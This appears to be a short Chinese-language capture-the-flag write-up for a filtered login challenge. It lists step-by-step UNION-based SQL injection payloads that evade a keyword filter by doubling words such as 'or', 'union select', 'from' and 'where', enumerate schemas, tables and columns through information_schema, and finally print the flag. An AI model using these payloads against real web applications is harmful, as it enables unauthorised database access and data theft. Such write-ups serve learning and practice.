题目提示有过滤,首先尝试万能密码登录
可以根据错误提示知道or被过滤掉了,可以尝试双写绕过
果然没这么简单得到flag,再尝试注入
猜字段,构造payload:?username=-1' union select 1,2,database() %23 &password=1'+oorr 1='1
又提示错误,肯定是union select被过滤了,双写绕过
payload:?username=-1' uniunionon seselectlect 1,2,3 %23 &password=1'+oorr 1='1
再 爆库名,payload:?username=-1' uniunionon seselectlect 1,2,database() %23 &password=1'+oorr 1='1
再看一下其他数据库名payload:?username=-1' uniunionon seselectlect 1,2,group_concat(table_schema) from infoorrmation_schema.tables %23 &password=1'+oorr 1='1
from被过滤了,双写绕过
最右边有一个名为ctf的表,爆表名
payload:?username=-1' uniunionon seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf' %23 &password=1'+oorr 1='1
确定flag就在这张表里
确定列名,payload:?username=-1' uniunionon seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='ctf' aandnd table_name='Flag'%23 &password=1'+oorr 1='1
最后,拿到flag,payload:?username=-1' uniunionon seselectlect 1,2,flag frfromom ctf.Flag %23 &password=1'+oorr 1='1
flag{151e9e1d-5cd1-4ba9-a36c-dc443466a92b}